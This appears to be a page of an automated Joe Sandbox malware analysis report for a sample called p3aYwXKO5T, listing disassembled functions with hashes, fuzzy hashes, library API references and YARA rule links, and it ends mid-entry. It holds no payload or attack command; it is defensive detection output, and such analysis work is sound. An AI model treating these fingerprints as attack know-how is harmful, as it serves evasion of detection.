Similarity

API ID:
String ID: 4
API String ID: 0-4088798008
Opcode ID: 5578bbf268cf1d7a6cc11f772dbe90f91f38951ddd0f84b7ddcb6c1c960a0822
Instruction ID: 87c9317698c35aa94f8d77f00dab63e18313219551dcc911064f130de4f629a5
Opcode Fuzzy Hash: 5578bbf268cf1d7a6cc11f772dbe90f91f38951ddd0f84b7ddcb6c1c960a0822
Instruction Fuzzy Hash: D36117B1E006159FCB28CF99C980AAEB7F1BF58314F2585A9D905A7701CB30F992CB94

Function 00423DF1 Relevance: 1.4, Strings: 1, Instructions: 173COMMONLIBRARYCODE

Download Yara Rule

Strings

4, xrefs: 00423F8B

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID:
String ID: 4
API String ID: 0-4088798008
Opcode ID: 5578bbf268cf1d7a6cc11f772dbe90f91f38951ddd0f84b7ddcb6c1c960a0822
Instruction ID: d3640ea578d556721f4490aaac2cfbcd5f657f790f84d66c55eb6511df690334
Opcode Fuzzy Hash: 5578bbf268cf1d7a6cc11f772dbe90f91f38951ddd0f84b7ddcb6c1c960a0822
Instruction Fuzzy Hash: 75612C71E002259FCB18CF49E680A6EB7B1BF58715F66816ED805A7305C738EE46CF94

Function 02325047 Relevance: .7, Instructions: 701COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2320000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aca00c27e9f0dc5049bb43eb222e30ca6b7b035fc8865b45e586624c015778d4
Instruction ID: eb605be20576830f6b34c25644e00d6787cf5f33f001ef57d4ebdc8b7b80a678
Opcode Fuzzy Hash: aca00c27e9f0dc5049bb43eb222e30ca6b7b035fc8865b45e586624c015778d4
Instruction Fuzzy Hash: B0225EB3F515145BDB0CCA5DDCA27ECB2E3AFD8214B0E813DA40AE3345EA79D9158648

Function 00404DE0 Relevance: .7, Instructions: 701COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aca00c27e9f0dc5049bb43eb222e30ca6b7b035fc8865b45e586624c015778d4
Instruction ID: eb605be20576830f6b34c25644e00d6787cf5f33f001ef57d4ebdc8b7b80a678
Opcode Fuzzy Hash: aca00c27e9f0dc5049bb43eb222e30ca6b7b035fc8865b45e586624c015778d4
Instruction Fuzzy Hash: B0225EB3F515145BDB0CCA5DDCA27ECB2E3AFD8214B0E813DA40AE3345EA79D9158648

Function 02324D97 Relevance: .2, Instructions: 230COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2320000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ff74d21853a1a9411e81bdca10e899a59f84e873a7064e611779bfdc9a01e76
Instruction ID: db1fd1ba1c2232ad9cc4c6d77c51c44956ff99f40563a50500130f415b6085d1
Opcode Fuzzy Hash: 1ff74d21853a1a9411e81bdca10e899a59f84e873a7064e611779bfdc9a01e76
Instruction Fuzzy Hash: E0812170A002659FEB15CF68D890BFEBBB1FF59304F0542A9D910A3792D3759949CBA0

Function 00404B30 Relevance: .2, Instructions: 230COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ff74d21853a1a9411e81bdca10e899a59f84e873a7064e611779bfdc9a01e76
Instruction ID: f9f22bcb052e71eb439f106f0b20dd6b4beb7377a8a8d7e69e270393853b03d6
Opcode Fuzzy Hash: 1ff74d21853a1a9411e81bdca10e899a59f84e873a7064e611779bfdc9a01e76
Instruction Fuzzy Hash: 618123B0E042459FEB15CF69D8807EEBBF1BF99300F15027AC910A7392D3789945CBA8

Function 02367B22 Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2320000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52dbd9b1eed41be0fe82de8a4e6ef126f6fae99cdba63995ffaced5ebaf03370
Instruction ID: 8c3c91de2b0be4742a7ed5bd5ac09cf636242f1cfad066bc2ce5673f4660a4d7
Opcode Fuzzy Hash: 52dbd9b1eed41be0fe82de8a4e6ef126f6fae99cdba63995ffaced5ebaf03370
Instruction Fuzzy Hash: A321B673F2043947770CC47ECC5627DB6E1C68C501745823AE8A6EA2C1D968D917E2E4

Function 004478BB Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52dbd9b1eed41be0fe82de8a4e6ef126f6fae99cdba63995ffaced5ebaf03370
Instruction ID: be9a9c8fc00186763e8d7bb87cc8d3a0b677fa6828bf284c090cc4d7b2bb0282
Opcode Fuzzy Hash: 52dbd9b1eed41be0fe82de8a4e6ef126f6fae99cdba63995ffaced5ebaf03370
Instruction Fuzzy Hash: D121B673F2043947770CC47E8C5227DB6E1C78C541745423AE8A6EA2C1D968D917E2E4

Function 02367A02 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2320000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a58c8da4f76282e75a4e86e97fff01a13a6512019c1140d55cc266cde0378697
Instruction ID: 42013cb50004e7c6d3ecb6ceb510e1774111332bcc7fd30b5dc0d84c400ac1e5
Opcode Fuzzy Hash: a58c8da4f76282e75a4e86e97fff01a13a6512019c1140d55cc266cde0378697
Instruction Fuzzy Hash: 0D11CA23F30C255B675C816D8C1727A91D6EBD814474F433AD826E7384E894DF23C290

Function 0044779B Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a58c8da4f76282e75a4e86e97fff01a13a6512019c1140d55cc266cde0378697
Instruction ID: f958b488d66865dd5c15af34d8bdfeb75cad4d2fb9f4de2ca6ead72c17438f02
Opcode Fuzzy Hash: a58c8da4f76282e75a4e86e97fff01a13a6512019c1140d55cc266cde0378697
Instruction Fuzzy Hash: 2411C633F30C255B775C81AD8C172BAA5D2EBD824070F433AD826E7284E9A4DE23D290

Function 02368AC7 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2320000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: d09772d62ceda5ff8b98f3c6672c9a83e843bc1874ca85cc83fc4e31bc780f14
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 4811C8F72410434796648E2DD8BC6BAE79DEACE12872DD77AD0418B75CD322D15CD604

Function 00448860 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: e52f5ae1c551d0b315bb206a3a6972e81541c048b5448aa17bd28fef73111c1e
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 75112B7720018243F6049A2DC8B45BFA795EFC63217AC437FD1414B758DA2AD945960C

Function 0079F9B3 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1686331848.000000000079F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0079F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_79f000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: 861ca41ab30001d9a5f1ca0dd8ea91828d317d334d356efe4127ae854053c4fd
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: 3A115E72340100AFDB54DF55EC85FA673EAEB89330B298069ED09CB316D679EC42CB60

Function 02320D90 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2320000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction ID: ce915ed1c0b7534e15ae6f1bba835834d719264da997e35e7c793561ffe50d33
Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction Fuzzy Hash: 5E012676A116108FDF25CF20C904BAA33F6FB96606F0540B5D90AE7281E370A88DCB80

Function 0235A569 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2320000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
Instruction ID: 4cf58b3b28847ec55c12129a15aa6b99ff9dbf85028c0c5841c76aa3b3dfc77c
Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
Instruction Fuzzy Hash: 75E08C72916238EFCB25DB98C904D8AF3FDEB48B04F1549A6B906D7110C270DE00DBD0

Function 0043A302 Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
Instruction ID: 18748302d0d64b74df810d503f589c32a7cabfcbb23ff82dab2ad40ae5c0e835
Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
Instruction Fuzzy Hash: 51E08C72961228EBCB15DB99C90498AF3ECEB4DB08F65109BF901D3250C274DE00C7D4

Function 0041F028 Relevance: 28.2, APIs: 15, Strings: 1, Instructions: 229COMMONLIBRARYCODE

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041F2BB

Strings

pEvents, xrefs: 0041F2B3

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: std::invalid_argument::invalid_argument
String ID: pEvents
API String ID: 2141394445-2498624650
Opcode ID: 6fac62366cbd6f5e6cb8ab906c87716b022ac4ce341200765e397ba53b1eaef3
Instruction ID: 66998cc49b15140c198e060e127dcf308e046c772bddf22695f73d3154dbb627
Opcode Fuzzy Hash: 6fac62366cbd6f5e6cb8ab906c87716b022ac4ce341200765e397ba53b1eaef3
Instruction Fuzzy Hash: 0D819F35D00218DBCF14DFA5C981BEEB7B1AF54314F14406AE801A7282D77DAD8ACB59

Function 0235F5C6 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0235F60A

Part of subcall function 0235F1A3: _free.LIBCMT ref: 0235F1C0
Part of subcall function 0235F1A3: _free.LIBCMT ref: 0235F1D2
Part of subcall function 0235F1A3: _free.LIBCMT ref: 0235F1E4
Part of subcall function 0235F1A3: _free.LIBCMT ref: 0235F1F6
Part of subcall function 0235F1A3: _free.LIBCMT ref: 0235F208
Part of subcall function 0235F1A3: _free.LIBCMT ref: 0235F21A
Part of subcall function 0235F1A3: _free.LIBCMT ref: 0235F22C
Part of subcall function 0235F1A3: _free.LIBCMT ref: 0235F23E
Part of subcall function 0235F1A3: _free.LIBCMT ref: 0235F250
Part of subcall function 0235F1A3: _free.LIBCMT ref: 0235F262
Part of subcall function 0235F1A3: _free.LIBCMT ref: 0235F274
Part of subcall function 0235F1A3: _free.LIBCMT ref: 0235F286
Part of subcall function 0235F1A3: _free.LIBCMT ref: 0235F298

_free.LIBCMT ref: 0235F5FF

Part of subcall function 0235B05C: HeapFree.KERNEL32(00000000,00000000,?,0235F334,?,00000000,?,?,?,0235F35B,?,00000007,?,?,0235F75D,?), ref: 0235B072
Part of subcall function 0235B05C: GetLastError.KERNEL32(?,?,0235F334,?,00000000,?,?,?,0235F35B,?,00000007,?,?,0235F75D,?,?), ref: 0235B084

_free.LIBCMT ref: 0235F621
_free.LIBCMT ref: 0235F636
_free.LIBCMT ref: 0235F641
_free.LIBCMT ref: 0235F663
_free.LIBCMT ref: 0235F676
_free.LIBCMT ref: 0235F684
_free.LIBCMT ref: 0235F68F
_free.LIBCMT ref: 0235F6C7
_free.LIBCMT ref: 0235F6CE
_free.LIBCMT ref: 0235F6EB
_free.LIBCMT ref: 0235F703

Strings

8"F, xrefs: 0235F6B2
`'F, xrefs: 0235F5DC

Memory Dump Source

Source File: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2320000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID: 8"F$`'F
API String ID: 161543041-3117062166
Opcode ID: 922a2dd1448a5ec672de729c29137a8fc27b2943f4b4aaf69956ccaefb2f6592
Instruction ID: a082e60a7e4a82e058b0bdeb8a27fcd94324a0e8ac1f486ddda460b827e96fb6
Opcode Fuzzy Hash: 922a2dd1448a5ec672de729c29137a8fc27b2943f4b4aaf69956ccaefb2f6592
Instruction Fuzzy Hash: CA314B71601625DFEB31AA38D844F5BB7EABF02368F104419E86DD79A0DB75A980CF14

Function 0043F35F Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0043F3A3

Part of subcall function 0043EF3C: _free.LIBCMT ref: 0043EF59
Part of subcall function 0043EF3C: _free.LIBCMT ref: 0043EF6B
Part of subcall function 0043EF3C: _free.LIBCMT ref: 0043EF7D
Part of subcall function 0043EF3C: _free.LIBCMT ref: 0043EF8F
Part of subcall function 0043EF3C: _free.LIBCMT ref: 0043EFA1
Part of subcall function 0043EF3C: _free.LIBCMT ref: 0043EFB3
Part of subcall function 0043EF3C: _free.LIBCMT ref: 0043EFC5
Part of subcall function 0043EF3C: _free.LIBCMT ref: 0043EFD7
Part of subcall function 0043EF3C: _free.LIBCMT ref: 0043EFE9
Part of subcall function 0043EF3C: _free.LIBCMT ref: 0043EFFB
Part of subcall function 0043EF3C: _free.LIBCMT ref: 0043F00D
Part of subcall function 0043EF3C: _free.LIBCMT ref: 0043F01F
Part of subcall function 0043EF3C: _free.LIBCMT ref: 0043F031

_free.LIBCMT ref: 0043F398

Part of subcall function 0043ADF5: HeapFree.KERNEL32(00000000,00000000,?,0043F0CD,?,00000000,?,?,?,0043F0F4,?,00000007,?,?,0043F4F6,?), ref: 0043AE0B
Part of subcall function 0043ADF5: GetLastError.KERNEL32(?,?,0043F0CD,?,00000000,?,?,?,0043F0F4,?,00000007,?,?,0043F4F6,?,?), ref: 0043AE1D

_free.LIBCMT ref: 0043F3BA
_free.LIBCMT ref: 0043F3CF
_free.LIBCMT ref: 0043F3DA
_free.LIBCMT ref: 0043F3FC
_free.LIBCMT ref: 0043F40F
_free.LIBCMT ref: 0043F41D
_free.LIBCMT ref: 0043F428
_free.LIBCMT ref: 0043F460
_free.LIBCMT ref: 0043F467
_free.LIBCMT ref: 0043F484
_free.LIBCMT ref: 0043F49C

Strings

`'F, xrefs: 0043F375
8"F, xrefs: 0043F44B

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID: 8"F$`'F
API String ID: 161543041-3117062166
Opcode ID: 922a2dd1448a5ec672de729c29137a8fc27b2943f4b4aaf69956ccaefb2f6592
Instruction ID: 543839021cf0bf63342fab8d7291383f9c2b30be018e8c543b9015e977d3828c
Opcode Fuzzy Hash: 922a2dd1448a5ec672de729c29137a8fc27b2943f4b4aaf69956ccaefb2f6592
Instruction Fuzzy Hash: 0C31A232A00201DFEB206A3AD845B5B73E6EF18315F10642FE485D7691DF78EC94CB19

Function 0233F28F Relevance: 24.2, APIs: 16, Instructions: 229COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0233F296
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0233F522

Memory Dump Source

Source File: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2320000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: H_prolog3std::invalid_argument::invalid_argument
String ID:
API String ID: 1590901807-0
Opcode ID: 6fac62366cbd6f5e6cb8ab906c87716b022ac4ce341200765e397ba53b1eaef3
Instruction ID: 0d726b377c67e7d22e7ac143447b2a13cd45012bc2a19c8548abaffa95090dd9
Opcode Fuzzy Hash: 6fac62366cbd6f5e6cb8ab906c87716b022ac4ce341200765e397ba53b1eaef3
Instruction Fuzzy Hash: 86818F31E00219DBDF26DFA8C984BEEB7B5BF44324F644159D801ABA81DB38EB45CB51

Function 0041D029 Relevance: 22.8, APIs: 9, Strings: 4, Instructions: 51libraryloaderCOMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(00465750,00000FA0,?,?,0041D007), ref: 0041D035
GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,0041D007), ref: 0041D040
GetModuleHandleW.KERNEL32(kernel32.dll,?,?,0041D007), ref: 0041D051
GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0041D063
GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0041D071
CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,0041D007), ref: 0041D094
___scrt_fastfail.LIBCMT ref: 0041D0A5
RtlDeleteCriticalSection.NTDLL(00465750), ref: 0041D0B0
CloseHandle.KERNEL32(00000000,?,?,0041D007), ref: 0041D0C0

Strings

SleepConditionVariableCS, xrefs: 0041D05D
api-ms-win-core-synch-l1-2-0.dll, xrefs: 0041D03B
kernel32.dll, xrefs: 0041D04C
WakeAllConditionVariable, xrefs: 0041D069

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin___scrt_fastfail
String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 3578986977-3242537097
Opcode ID: 5773b3b592dab99726245edcd6fa20dcc163fa756fd668b0a9920edcf870acc0
Instruction ID: da8957fb05adf3e2478d3987b837cced664d2ae1275a3d1fb98c7f3dc6632c06
Opcode Fuzzy Hash: 5773b3b592dab99726245edcd6fa20dcc163fa756fd668b0a9920edcf870acc0
Instruction Fuzzy Hash: 1501B575E40B11ABDB211B75AC08F9B3A98DB45B57F140132FC05D22A1EAB9CC41CA6E

Function 02352938 Relevance: 22.7, APIs: 15, Instructions: 231COMMON

Download Yara Rule

APIs

Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 0235294A

Part of subcall function 02352748: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 0235276B

Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 0235296B
Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 02352978
Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 023529C6
Concurrency::details::SchedulerBase::AcquireQuickCacheSlot.LIBCMT ref: 02352A4D
Concurrency::details::WorkSearchContext::QuickSearch.LIBCMT ref: 02352A60
Concurrency::details::WorkSearchContext::SearchCacheLocal_Runnables.LIBCONCRT ref: 02352AAD

Memory Dump Source

Source File: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2320000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Search$Work$Context::$Base::Scheduler$CachePriorityQuick$AcquireCheckItemItem::ListLocal_NextObjectPeriodicRunnablesScanSlot
String ID:
API String ID: 2530155754-0
Opcode ID: c59a2110c268144207470cacd74e4257a298ce88abd0f6ffd6155045285da657
Instruction ID: e1288724e09363bb1c6f2bd79faf305b9e29d5915477cd05ead849ed4856efdd
Opcode Fuzzy Hash: c59a2110c268144207470cacd74e4257a298ce88abd0f6ffd6155045285da657
Instruction Fuzzy Hash: B2818D30900269ABDF26DFA4C950FFF7BB6AF45308F044098EC496B252C7729966DB61

Function 004326D1 Relevance: 22.7, APIs: 15, Instructions: 231COMMON

Download Yara Rule

APIs

Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 004326E3

Part of subcall function 004324E1: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00432504

Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 00432704
Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 00432711
Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 0043275F
Concurrency::details::SchedulerBase::AcquireQuickCacheSlot.LIBCMT ref: 004327E6
Concurrency::details::WorkSearchContext::QuickSearch.LIBCMT ref: 004327F9
Concurrency::details::WorkSearchContext::SearchCacheLocal_Runnables.LIBCONCRT ref: 00432846

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Search$Work$Context::$Base::Scheduler$CachePriorityQuick$AcquireCheckItemItem::ListLocal_NextObjectPeriodicRunnablesScanSlot
String ID:
API String ID: 2530155754-0
Opcode ID: c59a2110c268144207470cacd74e4257a298ce88abd0f6ffd6155045285da657
Instruction ID: fb03d83531a47042b93fe6564ff1c061b34d3f88821af197b1cf19dfef14ec32
Opcode Fuzzy Hash: c59a2110c268144207470cacd74e4257a298ce88abd0f6ffd6155045285da657
Instruction Fuzzy Hash: 6B81C270900249ABDF169F54CA41BBF7BB1AF0D308F04509AEC4127352C7BA8D16DB65

Function 02344745 Relevance: 22.7, APIs: 15, Instructions: 189timeregistryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0234474C
ListArray.LIBCONCRT ref: 0234479F

Part of subcall function 02344580: RtlInitializeSListHead.NTDLL(?), ref: 0234464C
Part of subcall function 02344580: RtlInitializeSListHead.NTDLL(?), ref: 02344656

ListArray.LIBCONCRT ref: 023447D3
Hash.LIBCMT ref: 0234483C
Hash.LIBCMT ref: 0234484C
RtlInitializeSListHead.NTDLL(?), ref: 023448E1
RtlInitializeSListHead.NTDLL(?), ref: 023448EE
RtlInitializeSListHead.NTDLL(?), ref: 023448FB
RtlInitializeSListHead.NTDLL(?), ref: 02344908

Part of subcall function 02349EA8: std::bad_exception::bad_exception.LIBCMT ref: 02349ECA

RegisterWaitForSingleObject.KERNEL32(?,00000000,00427A15,?,000000FF,00000000), ref: 02344990
Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 023449B2
GetLastError.KERNEL32(023456F2,?,?,00000000,?,?), ref: 023449C4
Concurrency::details::platform::__CreateTimerQueueTimer.LIBCMT ref: 023449E1

Part of subcall function 0233FE11: CreateTimerQueueTimer.KERNEL32(?,?,00000000,?,?,023456F2,00000008,?,023449E6,?,00000000,00427A06,?,7FFFFFFF,7FFFFFFF,00000000), ref: 0233FE29

Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02344A0B

Memory Dump Source

Source File: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2320000_p3aYwXKO5T.jbxd

Yara matches

Similarity

